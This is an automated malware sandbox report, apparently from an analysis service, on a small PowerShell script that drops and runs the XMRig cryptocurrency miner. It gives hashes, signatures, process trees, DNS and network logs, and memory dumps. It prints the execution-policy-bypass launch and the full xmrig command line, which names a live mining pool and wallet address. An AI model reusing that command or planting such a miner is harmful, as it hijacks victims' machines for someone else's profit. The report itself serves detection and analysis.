Overview

overview

10

Static

static

1

file01 - c...2).ps1

windows10-2004-x64

10

file01 - c...2).ps1

windows10-1703-x64

10

file01 - c...2).ps1

windows10-2004-x64

10

file01 - c...2).ps1

windows11-21h2-x64

10

file01 - c...3).ps1

windows7-x64

3

file01 - c...3).ps1

windows10-1703-x64

10

file01 - c...3).ps1

windows10-2004-x64

10

file01 - c...3).ps1

windows11-21h2-x64

10

file01 - c...4).ps1

windows10-2004-x64

10

file01 - c...4).ps1

windows10-1703-x64

10

file01 - c...4).ps1

windows10-2004-x64

10

file01 - c...4).ps1

windows11-21h2-x64

10

file01 - c...5).ps1

windows10-1703-x64

10

file01 - c...5).ps1

windows10-1703-x64

10

file01 - c...5).ps1

windows10-2004-x64

10

file01 - c...5).ps1

windows11-21h2-x64

10

file01 - c...6).ps1

windows10-1703-x64

10

file01 - c...6).ps1

windows10-1703-x64

10

file01 - c...6).ps1

windows10-2004-x64

10

file01 - c...6).ps1

windows11-21h2-x64

10

file01 - c...7).ps1

windows10-2004-x64

10

file01 - c...7).ps1

windows10-1703-x64

10

file01 - c...7).ps1

windows10-2004-x64

10

file01 - c...7).ps1

windows11-21h2-x64

10

file01 - c...8).ps1

windows7-x64

3

file01 - c...8).ps1

windows10-1703-x64

10

file01 - c...8).ps1

windows10-2004-x64

10

file01 - c...8).ps1

windows11-21h2-x64

10

file01 - c...9).ps1

windows10-2004-x64

10

file01 - c...9).ps1

windows10-1703-x64

10

file01 - c...9).ps1

windows10-2004-x64

10

file01 - c...9).ps1

windows11-21h2-x64

10

Resubmissions

13/05/2024, 02:46 UTC

240513-c9jzwahd4v 10

13/05/2024, 02:46 UTC

240513-c9d4mahd4s 10

13/05/2024, 02:45 UTC

240513-c89h5shd3y 10

13/05/2024, 02:45 UTC

240513-c832csce34 10

13/05/2024, 02:45 UTC

240513-c8xjkshd3w 10

13/05/2024, 02:45 UTC

240513-c8qq2ace32 10

13/05/2024, 02:42 UTC

240513-c65geahd2z 10

13/05/2024, 02:41 UTC

240513-c6q9sahd2x 10

Analysis

  • max time kernel
    1790s
  • max time network
    1771s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13/05/2024, 02:45 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file01 - copia (8).ps1

  • Size

    510B

  • MD5

    2dcb4d51653aec1a829f3232d69f5e12

  • SHA1

    dd096e7d800b9f3ca0edc64955b4464d71789f80

  • SHA256

    d1902d3e519d0d87097fd8969280bd01bd139a5191faadaed0149e61b4a7495c

  • SHA512

    7def3731bbb3f7ac3895edcf14c645bbcc0608f09c6b03bf7ddaebf049f1f6f1aad4086548ab9fce7b2bbefd837de8377f8b81cf94022d84e35f1bba0af89143

Score
10/10
xmrigexecutionminer

Malware Config

Signatures

  • XMRig Miner payload 64 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1836
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
      "C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:5052

Network

  • flag-us
    DNS
    github.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • flag-us
    DNS
    objects.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    objects.githubusercontent.com
    IN A
    Response
    objects.githubusercontent.com
    IN A
    185.199.111.133
    objects.githubusercontent.com
    IN A
    185.199.109.133
    objects.githubusercontent.com
    IN A
    185.199.110.133
    objects.githubusercontent.com
    IN A
    185.199.108.133
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    195.34.35.161.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    195.34.35.161.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    self.events.data.microsoft.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    self.events.data.microsoft.com
    IN A
    Response
    self.events.data.microsoft.com
    IN CNAME
    self-events-data.trafficmanager.net
    self-events-data.trafficmanager.net
    IN CNAME
    onedscolprdwus20.westus.cloudapp.azure.com
    onedscolprdwus20.westus.cloudapp.azure.com
    IN A
    20.189.173.25
  • flag-us
    DNS
    249.197.17.2.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    249.197.17.2.in-addr.arpa
    IN PTR
    Response
    249.197.17.2.in-addr.arpa
    IN PTR
    a2-17-197-249deploystaticakamaitechnologiescom
  • flag-us
    DNS
    login.live.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    login.live.com
    IN A
    Response
    login.live.com
    IN CNAME
    login.msa.msidentity.com
    login.msa.msidentity.com
    IN CNAME
    www.tm.lg.prod.aadmsa.trafficmanager.net
    www.tm.lg.prod.aadmsa.trafficmanager.net
    IN CNAME
    prdv4a.aadg.msidentity.com
    prdv4a.aadg.msidentity.com
    IN CNAME
    www.tm.v4.a.prd.aadg.trafficmanager.net
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    40.126.32.134
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    40.126.32.133
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    20.190.160.22
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    40.126.32.136
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    40.126.32.140
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    20.190.160.17
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    40.126.32.138
    www.tm.v4.a.prd.aadg.trafficmanager.net
    IN A
    40.126.32.72
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.35.223.20.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    26.35.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • flag-us
    DNS
    240.197.17.2.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    240.197.17.2.in-addr.arpa
    IN PTR
    Response
    240.197.17.2.in-addr.arpa
    IN PTR
    a2-17-197-240deploystaticakamaitechnologiescom
  • flag-us
    DNS
    215.156.26.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    215.156.26.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.227.14
  • flag-us
    DNS
    25.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ctldl.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    ctldl.windowsupdate.com
    IN A
    Response
    ctldl.windowsupdate.com
    IN CNAME
    ctldl.windowsupdate.com.delivery.microsoft.com
    ctldl.windowsupdate.com.delivery.microsoft.com
    IN CNAME
    wu-b-net.trafficmanager.net
    wu-b-net.trafficmanager.net
    IN CNAME
    bg.microsoft.map.fastly.net
    bg.microsoft.map.fastly.net
    IN A
    199.232.210.172
    bg.microsoft.map.fastly.net
    IN A
    199.232.214.172
  • flag-us
    DNS
    arc.msn.com
    Remote address:
    8.8.8.8:53
    Request
    arc.msn.com
    IN A
    Response
    arc.msn.com
    IN CNAME
    arc.trafficmanager.net
    arc.trafficmanager.net
    IN CNAME
    iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com
    iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com
    IN A
    20.223.36.55
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    DNS
    54.120.234.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    54.120.234.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    arc.msn.com
    Remote address:
    8.8.8.8:53
    Request
    arc.msn.com
    IN A
    Response
    arc.msn.com
    IN CNAME
    arc.trafficmanager.net
    arc.trafficmanager.net
    IN CNAME
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    IN A
    20.223.35.26
  • flag-us
    DNS
    133.111.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.111.199.185.in-addr.arpa
    IN PTR
    Response
    133.111.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-111-133githubcom
  • flag-us
    DNS
    rx.unmineable.com
    Remote address:
    8.8.8.8:53
    Request
    rx.unmineable.com
    IN A
    Response
    rx.unmineable.com
    IN CNAME
    rx.unminable.com
    rx.unminable.com
    IN CNAME
    rx-eu.unminable.com
    rx-eu.unminable.com
    IN CNAME
    rx-eu-lon.unminable.com
    rx-eu-lon.unminable.com
    IN A
    161.35.34.195
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ctldl.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    ctldl.windowsupdate.com
    IN A
    Response
    ctldl.windowsupdate.com
    IN CNAME
    ctldl.windowsupdate.com.delivery.microsoft.com
    ctldl.windowsupdate.com.delivery.microsoft.com
    IN CNAME
    wu-b-net.trafficmanager.net
    wu-b-net.trafficmanager.net
    IN CNAME
    download.windowsupdate.com.edgesuite.net
    download.windowsupdate.com.edgesuite.net
    IN CNAME
    a767.dspw65.akamai.net
    a767.dspw65.akamai.net
    IN A
    2.17.197.249
    a767.dspw65.akamai.net
    IN A
    2.17.197.240
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ocsp.digicert.com
    Remote address:
    8.8.8.8:53
    Request
    ocsp.digicert.com
    IN A
    Response
    ocsp.digicert.com
    IN CNAME
    ocsp.edge.digicert.com
    ocsp.edge.digicert.com
    IN CNAME
    fp2e7a.wpc.2be4.phicdn.net
    fp2e7a.wpc.2be4.phicdn.net
    IN CNAME
    fp2e7a.wpc.phicdn.net
    fp2e7a.wpc.phicdn.net
    IN A
    192.229.221.95
  • flag-us
    DNS
    arc.msn.com
    Remote address:
    8.8.8.8:53
    Request
    arc.msn.com
    IN A
    Response
    arc.msn.com
    IN CNAME
    arc.trafficmanager.net
    arc.trafficmanager.net
    IN CNAME
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    IN A
    20.223.35.26
  • flag-us
    DNS
    ris.api.iris.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    ris.api.iris.microsoft.com
    IN A
    Response
    ris.api.iris.microsoft.com
    IN CNAME
    ris-prod.trafficmanager.net
    ris-prod.trafficmanager.net
    IN CNAME
    asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com
    asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com
    IN A
    20.234.120.54
  • flag-us
    DNS
    ctldl.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    ctldl.windowsupdate.com
    IN A
    Response
    ctldl.windowsupdate.com
    IN CNAME
    ctldl.windowsupdate.com.delivery.microsoft.com
    ctldl.windowsupdate.com.delivery.microsoft.com
    IN CNAME
    wu-b-net.trafficmanager.net
    wu-b-net.trafficmanager.net
    IN CNAME
    download.windowsupdate.com.edgesuite.net
    download.windowsupdate.com.edgesuite.net
    IN CNAME
    a767.dspw65.akamai.net
    a767.dspw65.akamai.net
    IN A
    2.17.197.240
    a767.dspw65.akamai.net
    IN A
    2.17.197.249
  • flag-us
    DNS
    ris.api.iris.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    ris.api.iris.microsoft.com
    IN A
    Response
    ris.api.iris.microsoft.com
    IN CNAME
    ris-prod.trafficmanager.net
    ris-prod.trafficmanager.net
    IN CNAME
    asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com
    asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com
    IN A
    20.234.120.54
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 464243
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: C54D0EDCABFA4DBF8154850A62407883 Ref B: LON04EDGE1019 Ref C: 2024-05-13T05:39:29Z
    date: Mon, 13 May 2024 05:39:29 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 382817
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: BAC1E2B10886423890E86135EA7D46DB Ref B: LON04EDGE1019 Ref C: 2024-05-13T05:39:29Z
    date: Mon, 13 May 2024 05:39:29 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 476246
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B166BE2EDB7B4AA6A2CD9CAC6D55CAE0 Ref B: LON04EDGE1019 Ref C: 2024-05-13T05:39:29Z
    date: Mon, 13 May 2024 05:39:29 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 499516
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F608B7372FD043AE9B84EB82895D54B3 Ref B: LON04EDGE1019 Ref C: 2024-05-13T05:39:29Z
    date: Mon, 13 May 2024 05:39:29 GMT
  • 20.26.156.215:443
    github.com
    tls
    powershell.exe
    1.1kB
     8.2kB
     11
    12
  • 185.199.111.133:443
    objects.githubusercontent.com
    tls
    powershell.exe
    70.0kB
     3.9MB
     1492
    2841
  • 161.35.34.195:443
    rx.unmineable.com
    tls
    xmrig.exe
    7.9kB
     20.8kB
     75
    74
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.3kB
     8.1kB
     16
    14
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    65.6kB
     1.9MB
     1384
    1375

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.3kB
     8.1kB
     16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.3kB
     8.1kB
     16
    14
  • 8.8.8.8:53
    github.com
    dns
    powershell.exe
    763 B
     1.7kB
     11
    11

    DNS Request

    github.com

    DNS Response

    20.26.156.215

    DNS Request

    objects.githubusercontent.com

    DNS Response

    185.199.111.133
    185.199.109.133
    185.199.110.133
    185.199.108.133

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    195.34.35.161.in-addr.arpa

    DNS Request

    self.events.data.microsoft.com

    DNS Response

    20.189.173.25

    DNS Request

    249.197.17.2.in-addr.arpa

    DNS Request

    login.live.com

    DNS Response

    40.126.32.134
    40.126.32.133
    20.190.160.22
    40.126.32.136
    40.126.32.140
    20.190.160.17
    40.126.32.138
    40.126.32.72

    DNS Request

    134.32.126.40.in-addr.arpa

    DNS Request

    26.35.223.20.in-addr.arpa

    DNS Request

    200.197.79.204.in-addr.arpa

    DNS Request

    240.197.17.2.in-addr.arpa

  • 8.8.8.8:53
    215.156.26.20.in-addr.arpa
    dns
    608 B
     1.5kB
     9
    9

    DNS Request

    215.156.26.20.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.227.14

    DNS Request

    25.173.189.20.in-addr.arpa

    DNS Request

    ctldl.windowsupdate.com

    DNS Response

    199.232.210.172
    199.232.214.172

    DNS Request

    arc.msn.com

    DNS Response

    20.223.36.55

    DNS Request

    55.36.223.20.in-addr.arpa

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

    DNS Request

    54.120.234.20.in-addr.arpa

    DNS Request

    arc.msn.com

    DNS Response

    20.223.35.26

  • 8.8.8.8:53
    133.111.199.185.in-addr.arpa
    dns
    685 B
     1.8kB
     10
    10

    DNS Request

    133.111.199.185.in-addr.arpa

    DNS Request

    rx.unmineable.com

    DNS Response

    161.35.34.195

    DNS Request

    14.227.111.52.in-addr.arpa

    DNS Request

    ctldl.windowsupdate.com

    DNS Response

    2.17.197.249
    2.17.197.240

    DNS Request

    172.210.232.199.in-addr.arpa

    DNS Request

    ocsp.digicert.com

    DNS Response

    192.229.221.95

    DNS Request

    arc.msn.com

    DNS Response

    20.223.35.26

    DNS Request

    ris.api.iris.microsoft.com

    DNS Response

    20.234.120.54

    DNS Request

    ctldl.windowsupdate.com

    DNS Response

    2.17.197.240
    2.17.197.249

    DNS Request

    ris.api.iris.microsoft.com

    DNS Response

    20.234.120.54

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ng00iz5y.csl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
    Filesize

    9.1MB

    MD5

    205ad9eb6acd6f58752899669b69fe74

    SHA1

    bedb78ac5034259b86c2cbc915de2e861e8d7604

    SHA256

    2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda

    SHA512

    28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

    Download Submit

  • memory/1836-0-0x00007FFEA7233000-0x00007FFEA7235000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1836-9-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1836-10-0x000002AAEDD10000-0x000002AAEDD32000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1836-11-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1836-12-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1836-14-0x000002AAEE210000-0x000002AAEE222000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1836-15-0x000002AAEE200000-0x000002AAEE20A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1836-49-0x00007FFEA7233000-0x00007FFEA7235000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1836-50-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5052-46-0x00000216AF200000-0x00000216AF220000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5052-47-0x00000216AF4A0000-0x00000216AF4C0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5052-48-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-51-0x00000216AF4C0000-0x00000216AF4E0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5052-52-0x0000021743820000-0x0000021743840000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5052-53-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-54-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-57-0x0000021743820000-0x0000021743840000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5052-56-0x00000216AF4C0000-0x00000216AF4E0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5052-55-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-58-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-59-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-60-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-61-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-62-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-63-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-64-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-65-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-66-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/5052-67-0x00007FF60AD50000-0x00007FF60B983000-memory.dmp

    Filesize

